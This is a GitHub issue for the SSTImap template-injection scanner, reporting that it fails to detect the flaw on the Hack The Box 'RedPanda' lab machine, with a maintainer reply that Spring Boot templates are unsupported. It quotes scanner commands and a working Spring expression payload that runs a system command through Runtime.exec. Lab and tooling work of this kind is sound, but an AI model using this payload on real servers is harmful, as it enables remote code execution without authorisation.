Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

SSTIMap fails to find vulnerabiilty on HTB RedPanda box #34

Open
edwardsd97 opened this issue Jan 15, 2024 · 1 comment
Open

SSTIMap fails to find vulnerabiilty on HTB RedPanda box #34

edwardsd97 opened this issue Jan 15, 2024 · 1 comment
Labels
delayed The issue will be fixed with a big update later template engine A template engine to add

Comments

@edwardsd97
Copy link

edwardsd97 commented Jan 15, 2024
edited
Loading

https://app.hackthebox.com/machines/481

python sstimap.py -u 'http://10.10.11.170:8080/search?name=test'

This box is vulnerable to Spring Boot e.g.
*{T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec('id').getInputStream())}

Also fails in post mode
python sstimap.py -m POST -u 'http://10.10.11.170:8080/search?name=test'
@vladko312
Copy link
Owner

SSTImap currently does not support Spring Boot templates. I will work on adding them in the future.

@vladko312 vladko312 added template engine A template engine to add delayed The issue will be fixed with a big update later labels Jan 16, 2024
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
delayed The issue will be fixed with a big update later template engine A template engine to add
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
2 participants
@edwardsd97 @vladko312